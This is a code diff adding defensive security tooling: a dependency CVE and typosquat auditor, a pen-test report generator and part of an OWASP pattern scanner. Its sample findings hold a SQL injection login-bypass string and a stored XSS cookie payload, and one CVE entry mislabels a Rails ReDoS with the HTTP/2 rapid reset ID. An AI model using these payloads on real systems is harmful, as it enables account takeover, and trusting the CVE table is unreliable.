+         "title": "NULL dereference in cryptography",
+         "description": "cryptography before 41.0.0 has a NULL pointer dereference in PKCS7 parsing.",
+         "remediation": "Upgrade cryptography to >=41.0.0"},
+        {"ecosystem": "pypi", "package": "pyyaml", "below": "6.0.1",
+         "cve": "CVE-2020-14343", "severity": "critical", "cvss": 9.8,
+         "title": "Arbitrary code execution in PyYAML",
+         "description": "PyYAML before 6.0.1 allows arbitrary code execution via yaml.load().",
+         "remediation": "Upgrade PyYAML to >=6.0.1 and use yaml.safe_load()"},
+        {"ecosystem": "go", "package": "golang.org/x/crypto", "below": "0.17.0",
+         "cve": "CVE-2023-48795", "severity": "medium", "cvss": 5.9,
+         "title": "Terrapin SSH prefix truncation attack",
+         "description": "golang.org/x/crypto before 0.17.0 vulnerable to SSH prefix truncation.",
+         "remediation": "Upgrade golang.org/x/crypto to >=0.17.0"},
+        {"ecosystem": "go", "package": "golang.org/x/net", "below": "0.17.0",
+         "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
+         "title": "HTTP/2 rapid reset DoS",
+         "description": "golang.org/x/net before 0.17.0 vulnerable to HTTP/2 rapid reset attack.",
+         "remediation": "Upgrade golang.org/x/net to >=0.17.0"},
+        {"ecosystem": "rubygems", "package": "rails", "below": "7.0.8",
+         "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
+         "title": "ReDoS in Rails",
+         "description": "Rails before 7.0.8 vulnerable to Regular Expression Denial of Service.",
+         "remediation": "Upgrade rails to >=7.0.8"},
+    ]
+
+    # Known typosquat / malicious package names
+    TYPOSQUAT_PACKAGES = {
+        "npm": ["crossenv", "event-stream-malicious", "flatmap-stream", "ua-parser-jss",
+                 "loadsh", "lodashs", "axois", "requets"],
+        "pypi": ["python3-dateutil", "jeIlyfish", "python-binance-sdk", "requestss",
+                 "djago", "flassk", "requets"],
+    }
+
+    def __init__(self, manifest_path: str, severity_filter: str = "low"):
+        self.manifest_path = Path(manifest_path)
+        self.severity_filter = severity_filter
+        self.severity_order = {"critical": 4, "high": 3, "medium": 2, "low": 1}
+        self.min_severity = self.severity_order.get(severity_filter, 1)
+
+    def audit(self) -> Dict:
+        """Run full audit on the manifest file."""
+        deps = self._parse_manifest()
+        vuln_findings = self._check_vulnerabilities(deps)
+        risky_patterns = self._check_risky_patterns(deps)
+
+        # Filter by severity
+        vuln_findings = [f for f in vuln_findings
+                         if self.severity_order.get(f.severity, 0) >= self.min_severity]
+        risky_patterns = [r for r in risky_patterns
+                          if self.severity_order.get(r.severity, 0) >= self.min_severity]
+
+        return {
+            "manifest": str(self.manifest_path),
+            "ecosystem": deps[0].ecosystem if deps else "unknown",
+            "total_dependencies": len(deps),
+            "dev_dependencies": len([d for d in deps if d.is_dev]),
+            "vulnerability_findings": vuln_findings,
+            "risky_patterns": risky_patterns,
+            "summary": {
+                "critical": len([f for f in vuln_findings if f.severity == "critical"]),
+                "high": len([f for f in vuln_findings if f.severity == "high"]),
+                "medium": len([f for f in vuln_findings if f.severity == "medium"]),
+                "low": len([f for f in vuln_findings if f.severity == "low"]),
+                "risky_patterns_count": len(risky_patterns),
+            }
+        }
+
+    def _parse_manifest(self) -> List[Dependency]:
+        """Detect manifest type and parse dependencies."""
+        name = self.manifest_path.name.lower()
+        try:
+            content = self.manifest_path.read_text(encoding="utf-8")
+        except (OSError, PermissionError) as e:
+            print(f"Error reading {self.manifest_path}: {e}", file=sys.stderr)
+            sys.exit(1)
+
+        if name == "package.json":
+            return self._parse_package_json(content)
+        elif name in ("requirements.txt", "requirements-dev.txt", "requirements_dev.txt"):
+            return self._parse_requirements(content)
+        elif name == "go.mod":
+            return self._parse_go_mod(content)
+        elif name in ("gemfile", "gemfile.lock"):
+            return self._parse_gemfile(content)
+        else:
+            print(f"Unsupported manifest type: {name}", file=sys.stderr)
+            print("Supported: package.json, requirements.txt, go.mod, Gemfile", file=sys.stderr)
+            sys.exit(1)
+
+    def _parse_package_json(self, content: str) -> List[Dependency]:
+        """Parse npm package.json."""
+        deps = []
+        try:
+            data = json.loads(content)
+        except json.JSONDecodeError as e:
+            print(f"Invalid JSON in package.json: {e}", file=sys.stderr)
+            sys.exit(1)
+
+        for name, version in data.get("dependencies", {}).items():
+            clean_ver = re.sub(r"[^0-9.]", "", version).strip(".")
+            deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=False))
+        for name, version in data.get("devDependencies", {}).items():
+            clean_ver = re.sub(r"[^0-9.]", "", version).strip(".")
+            deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=True))
+        return deps
+
+    def _parse_requirements(self, content: str) -> List[Dependency]:
+        """Parse pip requirements.txt."""
+        deps = []
+        for line in content.strip().split("\n"):
+            line = line.strip()
+            if not line or line.startswith("#") or line.startswith("-"):
+                continue
+            match = re.match(r"^([a-zA-Z0-9_.-]+)\s*(?:[=<>!~]+\s*)?([\d.]*)", line)
+            if match:
+                name, version = match.group(1), match.group(2) or "unknown"
+                deps.append(Dependency(name=name.lower(), version=version, ecosystem="pypi"))
+        return deps
+
+    def _parse_go_mod(self, content: str) -> List[Dependency]:
+        """Parse Go go.mod."""
+        deps = []
+        in_require = False
+        for line in content.strip().split("\n"):
+            line = line.strip()
+            if line.startswith("require ("):
+                in_require = True
+                continue
+            if line == ")":
+                in_require = False
+                continue
+            if in_require or line.startswith("require "):
+                cleaned = line.replace("require ", "").strip()
+                parts = cleaned.split()
+                if len(parts) >= 2:
+                    name = parts[0]
+                    version = parts[1].lstrip("v")
+                    indirect = "// indirect" in line
+                    deps.append(Dependency(name=name, version=version, ecosystem="go", is_dev=indirect))
+        return deps
+
+    def _parse_gemfile(self, content: str) -> List[Dependency]:
+        """Parse Ruby Gemfile."""
+        deps = []
+        for line in content.strip().split("\n"):
+            line = line.strip()
+            if not line or line.startswith("#"):
+                continue
+            match = re.match(r'''gem\s+['"]([\w-]+)['"](?:\s*,\s*['"]([^'"]*)['"'])?''', line)
+            if match:
+                name = match.group(1)
+                version = match.group(2) or "unknown"
+                version = re.sub(r"[~><=\s]", "", version)
+                deps.append(Dependency(name=name, version=version, ecosystem="rubygems"))
+        return deps
+
+    @staticmethod
+    def _version_below(installed: str, threshold: str) -> bool:
+        """Check if installed version is below threshold (simple numeric comparison)."""
+        try:
+            inst_parts = [int(x) for x in installed.split(".") if x.isdigit()]
+            thresh_parts = [int(x) for x in threshold.split(".") if x.isdigit()]
+            # Pad shorter list
+            max_len = max(len(inst_parts), len(thresh_parts))
+            inst_parts.extend([0] * (max_len - len(inst_parts)))
+            thresh_parts.extend([0] * (max_len - len(thresh_parts)))
+            return inst_parts < thresh_parts
+        except (ValueError, IndexError):
+            return False
+
+    def _check_vulnerabilities(self, deps: List[Dependency]) -> List[VulnerabilityFinding]:
+        """Check dependencies against known CVE database."""
+        findings = []
+        for dep in deps:
+            for vuln in self.KNOWN_VULNS:
+                if (dep.ecosystem == vuln["ecosystem"] and
+                        dep.name.lower() == vuln["package"].lower() and
+                        self._version_below(dep.version, vuln["below"])):
+                    findings.append(VulnerabilityFinding(
+                        package=dep.name,
+                        installed_version=dep.version,
+                        vulnerable_range=f"< {vuln['below']}",
+                        cve_id=vuln["cve"],
+                        severity=vuln["severity"],
+                        title=vuln["title"],
+                        description=vuln["description"],
+                        remediation=vuln["remediation"],
+                        cvss_score=vuln.get("cvss", 0.0),
+                        references=[f"https://nvd.nist.gov/vuln/detail/{vuln['cve']}"],
+                    ))
+        return findings
+
+    def _check_risky_patterns(self, deps: List[Dependency]) -> List[RiskyPattern]:
+        """Detect risky dependency patterns."""
+        patterns = []
+        ecosystem = deps[0].ecosystem if deps else "unknown"
+
+        # Check for typosquat packages
+        typosquats = self.TYPOSQUAT_PACKAGES.get(ecosystem, [])
+        for dep in deps:
+            if dep.name.lower() in [t.lower() for t in typosquats]:
+                patterns.append(RiskyPattern(
+                    package=dep.name,
+                    pattern_type="typosquat",
+                    severity="critical",
+                    description=f"'{dep.name}' is a known typosquat or malicious package name.",
+                    recommendation="Remove immediately and check for compromised data. Install the legitimate package.",
+                ))
+
+        # Check for wildcard/unpinned versions
+        for dep in deps:
+            if dep.version in ("*", "latest", "unknown", ""):
+                patterns.append(RiskyPattern(
+                    package=dep.name,
+                    pattern_type="unpinned",
+                    severity="medium",
+                    description=f"'{dep.name}' has an unpinned version ({dep.version}).",
+                    recommendation="Pin to a specific version to prevent supply chain attacks.",
+                ))
+
+        # Check for excessive dev dependencies in production
+        dev_count = len([d for d in deps if d.is_dev])
+        total = len(deps)
+        if total > 0 and dev_count / total > 0.7:
+            patterns.append(RiskyPattern(
+                package="(project-level)",
+                pattern_type="dev-heavy",
+                severity="low",
+                description=f"{dev_count}/{total} dependencies are dev-only. Large dev surface increases supply chain risk.",
+                recommendation="Review dev dependencies. Remove unused ones. Consider using --production for installs.",
+            ))
+
+        return patterns
+
+
+def format_report_text(result: Dict) -> str:
+    """Format audit result as human-readable text."""
+    lines = []
+    lines.append("=" * 70)
+    lines.append("DEPENDENCY VULNERABILITY AUDIT REPORT")
+    lines.append(f"Manifest: {result['manifest']}")
+    lines.append(f"Ecosystem: {result['ecosystem']}")
+    lines.append(f"Total dependencies: {result['total_dependencies']} ({result['dev_dependencies']} dev)")
+    lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
+    lines.append("=" * 70)
+
+    summary = result["summary"]
+    lines.append(f"\nSummary: {summary['critical']} critical, {summary['high']} high, "
+                 f"{summary['medium']} medium, {summary['low']} low, "
+                 f"{summary['risky_patterns_count']} risky pattern(s)")
+
+    vulns = result["vulnerability_findings"]
+    if vulns:
+        lines.append(f"\n--- VULNERABILITY FINDINGS ({len(vulns)}) ---\n")
+        for v in vulns:
+            lines.append(f"  [{v.severity.upper()}] {v.package} {v.installed_version}")
+            lines.append(f"    CVE: {v.cve_id} (CVSS: {v.cvss_score})")
+            lines.append(f"    {v.title}")
+            lines.append(f"    Vulnerable: {v.vulnerable_range}")
+            lines.append(f"    Fix: {v.remediation}")
+            lines.append("")
+    else:
+        lines.append("\nNo known vulnerabilities found in dependencies.")
+
+    risky = result["risky_patterns"]
+    if risky:
+        lines.append(f"\n--- RISKY PATTERNS ({len(risky)}) ---\n")
+        for r in risky:
+            lines.append(f"  [{r.severity.upper()}] {r.package} — {r.pattern_type}")
+            lines.append(f"    {r.description}")
+            lines.append(f"    Fix: {r.recommendation}")
+            lines.append("")
+
+    return "\n".join(lines)
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Dependency Auditor — Analyze package manifests for known vulnerabilities and risky patterns.",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Supported manifests:
+  package.json      (npm)
+  requirements.txt  (pip/PyPI)
+  go.mod            (Go)
+  Gemfile           (Ruby)
+
+Examples:
+  %(prog)s --file package.json
+  %(prog)s --file requirements.txt --severity high
+  %(prog)s --file go.mod --json
+        """,
+    )
+    parser.add_argument("--file", required=True, metavar="PATH",
+                        help="Path to package manifest file")
+    parser.add_argument("--severity", choices=["low", "medium", "high", "critical"], default="low",
+                        help="Minimum severity to report (default: low)")
+    parser.add_argument("--json", action="store_true", dest="json_output",
+                        help="Output results as JSON")
+    args = parser.parse_args()
+
+    if not Path(args.file).exists():
+        print(f"Error: File not found: {args.file}", file=sys.stderr)
+        sys.exit(1)
+
+    auditor = DependencyAuditor(manifest_path=args.file, severity_filter=args.severity)
+    result = auditor.audit()
+
+    if args.json_output:
+        json_result = {
+            "manifest": result["manifest"],
+            "ecosystem": result["ecosystem"],
+            "total_dependencies": result["total_dependencies"],
+            "dev_dependencies": result["dev_dependencies"],
+            "summary": result["summary"],
+            "vulnerability_findings": [asdict(f) for f in result["vulnerability_findings"]],
+            "risky_patterns": [asdict(r) for r in result["risky_patterns"]],
+            "generated_at": datetime.now().isoformat(),
+        }
+        print(json.dumps(json_result, indent=2))
+    else:
+        print(format_report_text(result))
+
+    # Exit non-zero if critical or high vulnerabilities found
+    if result["summary"]["critical"] > 0 or result["summary"]["high"] > 0:
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()
--- a/engineering-team/security-pen-testing/scripts/pentest_report_generator.py
+++ b/engineering-team/security-pen-testing/scripts/pentest_report_generator.py
@@ -0,0 +1,462 @@
+#!/usr/bin/env python3
+"""
+Pen Test Report Generator - Generate structured penetration testing reports from findings.
+
+Table of Contents:
+    PentestReportGenerator - Main class for report generation
+        __init__               - Initialize with findings data
+        generate_markdown()    - Generate markdown report
+        generate_json()        - Generate structured JSON report
+        _executive_summary()   - Build executive summary section
+        _findings_table()      - Build severity-sorted findings table
+        _detailed_findings()   - Build detailed findings with evidence
+        _remediation_matrix()  - Build effort vs. impact remediation matrix
+        _calculate_risk_score() - Calculate overall risk score
+    main() - CLI entry point
+
+Usage:
+    python pentest_report_generator.py --findings findings.json --format md --output report.md
+    python pentest_report_generator.py --findings findings.json --format json
+    python pentest_report_generator.py --findings findings.json --format md
+"""
+
+import argparse
+import json
+import sys
+from dataclasses import dataclass, asdict, field
+from datetime import datetime
+from pathlib import Path
+from typing import Dict, List, Optional
+
+
+@dataclass
+class Finding:
+    """A single pen test finding."""
+    title: str
+    severity: str  # critical, high, medium, low, info
+    cvss_score: float
+    category: str
+    description: str
+    evidence: str
+    impact: str
+    remediation: str
+    cvss_vector: str = ""
+    references: List[str] = field(default_factory=list)
+    effort: str = "medium"  # low, medium, high — remediation effort
+
+
+SEVERITY_ORDER = {"critical": 5, "high": 4, "medium": 3, "low": 2, "info": 1}
+
+
+class PentestReportGenerator:
+    """Generate professional penetration testing reports from structured findings."""
+
+    def __init__(self, findings: List[Finding], metadata: Optional[Dict] = None):
+        self.findings = sorted(findings, key=lambda f: SEVERITY_ORDER.get(f.severity, 0), reverse=True)
+        self.metadata = metadata or {}
+        self.generated_at = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+
+    def generate_markdown(self) -> str:
+        """Generate a complete markdown pen test report."""
+        sections = []
+        sections.append(self._header())
+        sections.append(self._executive_summary())
+        sections.append(self._scope_section())
+        sections.append(self._findings_table())
+        sections.append(self._detailed_findings())
+        sections.append(self._remediation_matrix())
+        sections.append(self._methodology_section())
+        sections.append(self._appendix())
+        return "\n\n".join(sections)
+
+    def generate_json(self) -> Dict:
+        """Generate structured JSON report."""
+        return {
+            "report_metadata": {
+                "title": self.metadata.get("title", "Penetration Test Report"),
+                "target": self.metadata.get("target", "Not specified"),
+                "tester": self.metadata.get("tester", "Not specified"),
+                "date_range": self.metadata.get("date_range", "Not specified"),
+                "generated_at": self.generated_at,
+                "overall_risk_score": self._calculate_risk_score(),
+                "overall_risk_level": self._risk_level(),
+            },
+            "summary": {
+                "total_findings": len(self.findings),
+                "critical": len([f for f in self.findings if f.severity == "critical"]),
+                "high": len([f for f in self.findings if f.severity == "high"]),
+                "medium": len([f for f in self.findings if f.severity == "medium"]),
+                "low": len([f for f in self.findings if f.severity == "low"]),
+                "info": len([f for f in self.findings if f.severity == "info"]),
+            },
+            "findings": [asdict(f) for f in self.findings],
+            "remediation_priority": self._remediation_priority_list(),
+        }
+
+    def _header(self) -> str:
+        title = self.metadata.get("title", "Penetration Test Report")
+        target = self.metadata.get("target", "Not specified")
+        tester = self.metadata.get("tester", "Not specified")
+        date_range = self.metadata.get("date_range", "Not specified")
+        lines = [
+            f"# {title}",
+            "",
+            "| Field | Value |",
+            "|-------|-------|",
+            f"| **Target** | {target} |",
+            f"| **Tester** | {tester} |",
+            f"| **Date Range** | {date_range} |",
+            f"| **Report Generated** | {self.generated_at} |",
+            f"| **Overall Risk** | {self._risk_level()} (Score: {self._calculate_risk_score():.1f}/10) |",
+            f"| **Total Findings** | {len(self.findings)} |",
+        ]
+        return "\n".join(lines)
+
+    def _executive_summary(self) -> str:
+        critical = len([f for f in self.findings if f.severity == "critical"])
+        high = len([f for f in self.findings if f.severity == "high"])
+        medium = len([f for f in self.findings if f.severity == "medium"])
+        low = len([f for f in self.findings if f.severity == "low"])
+        info = len([f for f in self.findings if f.severity == "info"])
+        risk_score = self._calculate_risk_score()
+        risk_level = self._risk_level()
+
+        lines = [
+            "## Executive Summary",
+            "",
+            f"This penetration test identified **{len(self.findings)} findings** across the target application. "
+            f"The overall risk level is **{risk_level}** with a score of **{risk_score:.1f}/10**.",
+            "",
+            "### Finding Severity Distribution",
+            "",
+            "| Severity | Count |",
+            "|----------|-------|",
+            f"| Critical | {critical} |",
+            f"| High | {high} |",
+            f"| Medium | {medium} |",
+            f"| Low | {low} |",
+            f"| Informational | {info} |",
+        ]
+
+        # Top 3 findings
+        if self.findings:
+            lines.append("")
+            lines.append("### Top Priority Findings")
+            lines.append("")
+            for i, f in enumerate(self.findings[:3], 1):
+                lines.append(f"{i}. **{f.title}** ({f.severity.upper()}, CVSS {f.cvss_score}) — {f.impact[:120]}")
+
+        # Risk assessment
+        lines.append("")
+        if critical > 0:
+            lines.append("> **CRITICAL RISK**: Immediate remediation required. Critical vulnerabilities "
+                         "allow attackers to compromise the system with minimal effort.")
+        elif high > 0:
+            lines.append("> **HIGH RISK**: Prompt remediation recommended. High-severity vulnerabilities "
+                         "pose significant risk of exploitation.")
+        elif medium > 0:
+            lines.append("> **MODERATE RISK**: Remediation should be planned within the next sprint. "
+                         "Medium findings may be chained for greater impact.")
+        else:
+            lines.append("> **LOW RISK**: The application has a reasonable security posture. "
+                         "Address low-severity findings during regular maintenance.")
+
+        return "\n".join(lines)
+
+    def _scope_section(self) -> str:
+        scope = self.metadata.get("scope", "Full application security assessment")
+        exclusions = self.metadata.get("exclusions", "None specified")
+        test_type = self.metadata.get("test_type", "Gray box")
+        lines = [
+            "## Scope",
+            "",
+            f"- **In Scope**: {scope}",
+            f"- **Exclusions**: {exclusions}",
+            f"- **Test Type**: {test_type}",
+        ]
+        return "\n".join(lines)
+
+    def _findings_table(self) -> str:
+        lines = [
+            "## Findings Overview",
+            "",
+            "| # | Severity | CVSS | Title | Category |",
+            "|---|----------|------|-------|----------|",
+        ]
+        for i, f in enumerate(self.findings, 1):
+            sev_badge = f.severity.upper()
+            lines.append(f"| {i} | {sev_badge} | {f.cvss_score} | {f.title} | {f.category} |")
+        return "\n".join(lines)
+
+    def _detailed_findings(self) -> str:
+        lines = ["## Detailed Findings"]
+        for i, f in enumerate(self.findings, 1):
+            lines.append("")
+            lines.append(f"### {i}. {f.title}")
+            lines.append("")
+            lines.append(f"**Severity:** {f.severity.upper()} | **CVSS:** {f.cvss_score}"
+                         + (f" | **Vector:** `{f.cvss_vector}`" if f.cvss_vector else ""))
+            lines.append(f"**Category:** {f.category}")
+            lines.append("")
+            lines.append("#### Description")
+            lines.append("")
+            lines.append(f"{f.description}")
+            lines.append("")
+            lines.append("#### Evidence")
+            lines.append("")
+            lines.append("```")
+            lines.append(f"{f.evidence}")
+            lines.append("```")
+            lines.append("")
+            lines.append("#### Impact")
+            lines.append("")
+            lines.append(f"{f.impact}")
+            lines.append("")
+            lines.append("#### Remediation")
+            lines.append("")
+            lines.append(f"{f.remediation}")
+            if f.references:
+                lines.append("")
+                lines.append("#### References")
+                lines.append("")
+                for ref in f.references:
+                    lines.append(f"- {ref}")
+        return "\n".join(lines)
+
+    def _remediation_matrix(self) -> str:
+        lines = [
+            "## Remediation Priority Matrix",
+            "",
+            "Prioritize remediation based on severity and effort:",
+            "",
+            "| # | Finding | Severity | Effort | Priority |",
+            "|---|---------|----------|--------|----------|",
+        ]
+        for i, f in enumerate(self.findings, 1):
+            priority = self._compute_priority(f)
+            lines.append(f"| {i} | {f.title} | {f.severity.upper()} | {f.effort} | {priority} |")
+
+        lines.append("")
+        lines.append("**Priority Key:** P1 = Fix immediately, P2 = Fix this sprint, "
+                      "P3 = Fix this quarter, P4 = Backlog")
+        return "\n".join(lines)
+
+    def _methodology_section(self) -> str:
+        lines = [
+            "## Methodology",
+            "",
+            "Testing followed the OWASP Testing Guide v4.2 and PTES (Penetration Testing Execution Standard):",
+            "",
+            "1. **Reconnaissance** — Mapped attack surface, identified endpoints and technologies",
+            "2. **Vulnerability Discovery** — Automated scanning + manual testing for OWASP Top 10",
+            "3. **Exploitation** — Validated findings with proof-of-concept (non-destructive)",
+            "4. **Post-Exploitation** — Assessed lateral movement and data access potential",
+            "5. **Reporting** — Documented findings with evidence and remediation guidance",
+        ]
+        return "\n".join(lines)
+
+    def _appendix(self) -> str:
+        lines = [
+            "## Appendix",
+            "",
+            "### CVSS Scoring Reference",
+            "",
+            "| Score Range | Severity |",
+            "|-------------|----------|",
+            "| 9.0 - 10.0 | Critical |",
+            "| 7.0 - 8.9 | High |",
+            "| 4.0 - 6.9 | Medium |",
+            "| 0.1 - 3.9 | Low |",
+            "| 0.0 | Informational |",
+            "",
+            "### Disclaimer",
+            "",
+            "This report represents a point-in-time assessment. New vulnerabilities may emerge after "
+            "the testing period. Regular security assessments are recommended.",
+            "",
+            f"---\n\n*Report generated on {self.generated_at}*",
+        ]
+        return "\n".join(lines)
+
+    def _calculate_risk_score(self) -> float:
+        """Calculate overall risk score (0-10) based on findings."""
+        if not self.findings:
+            return 0.0
+        # Weighted by severity
+        weights = {"critical": 10, "high": 7, "medium": 4, "low": 1.5, "info": 0.5}
+        total_weight = sum(weights.get(f.severity, 0) for f in self.findings)
+        # Normalize: cap at 10, scale based on number of findings
+        score = min(10.0, total_weight / max(len(self.findings) * 0.5, 1))
+        return round(score, 1)
+
+    def _risk_level(self) -> str:
+        """Return risk level string based on score."""
+        score = self._calculate_risk_score()
+        if score >= 9.0:
+            return "CRITICAL"
+        elif score >= 7.0:
+            return "HIGH"
+        elif score >= 4.0:
+            return "MEDIUM"
+        elif score > 0:
+            return "LOW"
+        return "NONE"
+
+    def _compute_priority(self, finding: Finding) -> str:
+        """Compute remediation priority from severity and effort."""
+        sev = SEVERITY_ORDER.get(finding.severity, 0)
+        effort_map = {"low": 3, "medium": 2, "high": 1}
+        effort_val = effort_map.get(finding.effort, 2)
+        score = sev * effort_val
+        if score >= 12:
+            return "P1"
+        elif score >= 8:
+            return "P2"
+        elif score >= 4:
+            return "P3"
+        return "P4"
+
+    def _remediation_priority_list(self) -> List[Dict]:
+        """Return ordered list of remediation priorities for JSON output."""
+        result = []
+        for f in self.findings:
+            result.append({
+                "title": f.title,
+                "severity": f.severity,
+                "effort": f.effort,
+                "priority": self._compute_priority(f),
+                "remediation": f.remediation,
+            })
+        return result
+
+
+def load_findings(path: str) -> tuple:
+    """Load findings from a JSON file."""
+    try:
+        content = Path(path).read_text(encoding="utf-8")
+        data = json.loads(content)
+    except (OSError, json.JSONDecodeError) as e:
+        print(f"Error loading findings: {e}", file=sys.stderr)
+        sys.exit(1)
+
+    # Support both list-of-findings and object-with-metadata formats
+    metadata = {}
+    findings_data = data
+    if isinstance(data, dict):
+        metadata = data.get("metadata", {})
+        findings_data = data.get("findings", [])
+
+    findings = []
+    for item in findings_data:
+        findings.append(Finding(
+            title=item.get("title", "Untitled Finding"),
+            severity=item.get("severity", "medium"),
+            cvss_score=float(item.get("cvss_score", 0.0)),
+            category=item.get("category", "Uncategorized"),
+            description=item.get("description", ""),
+            evidence=item.get("evidence", "No evidence provided"),
+            impact=item.get("impact", ""),
+            remediation=item.get("remediation", ""),
+            cvss_vector=item.get("cvss_vector", ""),
+            references=item.get("references", []),
+            effort=item.get("effort", "medium"),
+        ))
+    return findings, metadata
+
+
+def generate_sample_findings() -> str:
+    """Generate a sample findings JSON for reference."""
+    sample = [
+        {
+            "title": "SQL Injection in Login Endpoint",
+            "severity": "critical",
+            "cvss_score": 9.8,
+            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+            "category": "A03:2021 - Injection",
+            "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
+            "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
+            "impact": "Full database access, authentication bypass, potential remote code execution.",
+            "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
+            "references": ["https://cwe.mitre.org/data/definitions/89.html"],
+            "effort": "low"
+        },
+        {
+            "title": "Stored XSS in User Profile",
+            "severity": "high",
+            "cvss_score": 7.1,
+            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
+            "category": "A03:2021 - Injection",
+            "description": "The user profile 'bio' field does not sanitize HTML input.",
+            "evidence": "Submitted <img src=x onerror=alert(document.cookie)> in bio field.\nVisiting the profile page executes the payload.",
+            "impact": "Session hijacking, account takeover, phishing via stored malicious content.",
+            "remediation": "Sanitize all user input with DOMPurify. Implement Content-Security-Policy.",
+            "references": ["https://cwe.mitre.org/data/definitions/79.html"],
+            "effort": "low"
+        }
+    ]
+    return json.dumps(sample, indent=2)
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Pen Test Report Generator — Generate professional penetration testing reports from structured findings.",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Examples:
+  %(prog)s --findings findings.json --format md --output report.md
+  %(prog)s --findings findings.json --format json
+  %(prog)s --sample > sample_findings.json
+
+Findings JSON format:
+  A JSON array of objects with: title, severity, cvss_score, category,
+  description, evidence, impact, remediation, cvss_vector, references, effort.
+
+  Use --sample to generate a template.
+        """,
+    )
+    parser.add_argument("--findings", metavar="FILE",
+                        help="Path to findings JSON file")
+    parser.add_argument("--format", choices=["md", "json"], default="md",
+                        help="Output format (default: md)")
+    parser.add_argument("--output", metavar="FILE",
+                        help="Output file path (default: stdout)")
+    parser.add_argument("--json", action="store_true", dest="json_shortcut",
+                        help="Shortcut for --format json")
+    parser.add_argument("--sample", action="store_true",
+                        help="Print sample findings JSON and exit")
+    args = parser.parse_args()
+
+    if args.sample:
+        print(generate_sample_findings())
+        return
+
+    if not args.findings:
+        parser.error("--findings is required (use --sample to generate a template)")
+
+    if not Path(args.findings).exists():
+        print(f"Error: File not found: {args.findings}", file=sys.stderr)
+        sys.exit(1)
+
+    output_format = "json" if args.json_shortcut else args.format
+    findings, metadata = load_findings(args.findings)
+
+    if not findings:
+        print("No findings loaded. Check the JSON file format.", file=sys.stderr)
+        sys.exit(1)
+
+    generator = PentestReportGenerator(findings=findings, metadata=metadata)
+
+    if output_format == "json":
+        result = json.dumps(generator.generate_json(), indent=2)
+    else:
+        result = generator.generate_markdown()
+
+    if args.output:
+        Path(args.output).write_text(result, encoding="utf-8")
+        print(f"Report written to {args.output}")
+    else:
+        print(result)
+
+
+if __name__ == "__main__":
+    main()
--- a/engineering-team/security-pen-testing/scripts/vulnerability_scanner.py
+++ b/engineering-team/security-pen-testing/scripts/vulnerability_scanner.py
@@ -0,0 +1,545 @@
+#!/usr/bin/env python3
+"""
+Vulnerability Scanner - Generate OWASP Top 10 security checklists and scan for common patterns.
+
+Table of Contents:
+    VulnerabilityScanner - Main class for vulnerability scanning
+        __init__            - Initialize with target type and scope
+        generate_checklist  - Generate OWASP Top 10 checklist for target
+        scan_source         - Scan source directory for vulnerability patterns
+        _scan_file          - Scan individual file for regex patterns
+        _get_owasp_checks   - Return OWASP checks for target type
+    main() - CLI entry point
+
+Usage:
+    python vulnerability_scanner.py --target web --scope full
+    python vulnerability_scanner.py --target api --scope quick --json
+    python vulnerability_scanner.py --target web --source /path/to/code --scope full
+"""
+
+import argparse
+import json
+import os
+import re
+import sys
+from dataclasses import dataclass, asdict, field
+from datetime import datetime
+from pathlib import Path
+from typing import Dict, List, Optional
+
+
+@dataclass
+class CheckItem:
+    """A single check item in the OWASP checklist."""
+    owasp_id: str
+    owasp_category: str
+    check_id: str
+    title: str
+    description: str
+    test_procedure: str
+    severity: str  # critical, high, medium, low, info
+    applicable_targets: List[str] = field(default_factory=list)
+    status: str = "pending"  # pending, pass, fail, na
+
+
+@dataclass
+class SourceFinding:
+    """A vulnerability pattern found in source code."""
+    rule_id: str
+    title: str
+    severity: str
+    owasp_category: str
+    file_path: str
+    line_number: int
+    code_snippet: str
+    recommendation: str
+
+
+class VulnerabilityScanner:
+    """Generate OWASP Top 10 checklists and scan source code for vulnerability patterns."""
+
+    SCAN_EXTENSIONS = {
+        ".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go",
+        ".rb", ".php", ".cs", ".rs", ".html", ".vue", ".svelte",
+    }
+
+    SKIP_DIRS = {
+        "node_modules", ".git", "__pycache__", ".venv", "venv",
+        "vendor", "dist", "build", ".next", "target",
+    }
+
+    def __init__(self, target: str = "web", scope: str = "full", source: Optional[str] = None):
+        self.target = target
+        self.scope = scope
+        self.source = source
+
+    def generate_checklist(self) -> List[CheckItem]:
+        """Generate OWASP Top 10 checklist for the given target and scope."""
+        all_checks = self._get_owasp_checks()
+        filtered = []
+        for check in all_checks:
+            if self.target not in check.applicable_targets and "all" not in check.applicable_targets:
+                continue
+            if self.scope == "quick" and check.severity in ("low", "info"):
+                continue
+            filtered.append(check)
+        return filtered
+
+    def scan_source(self, path: str) -> List[SourceFinding]:
+        """Scan source directory for common vulnerability patterns."""
+        findings = []
+        source_path = Path(path)
+        if not source_path.exists():
+            return findings
+
+        for root, dirs, files in os.walk(source_path):
+            dirs[:] = [d for d in dirs if d not in self.SKIP_DIRS]
+            for fname in files:
+                fpath = Path(root) / fname
+                if fpath.suffix in self.SCAN_EXTENSIONS:
+                    findings.extend(self._scan_file(fpath))
+        return findings
+
+    def _scan_file(self, file_path: Path) -> List[SourceFinding]:
+        """Scan a single file for vulnerability patterns."""
+        findings = []
+        try:
+            content = file_path.read_text(encoding="utf-8", errors="ignore")
+        except (OSError, PermissionError):
+            return findings
+
+        patterns = [
+            {
+                "rule_id": "SQLI-001",
+                "title": "Potential SQL Injection (string concatenation)",
+                "severity": "critical",
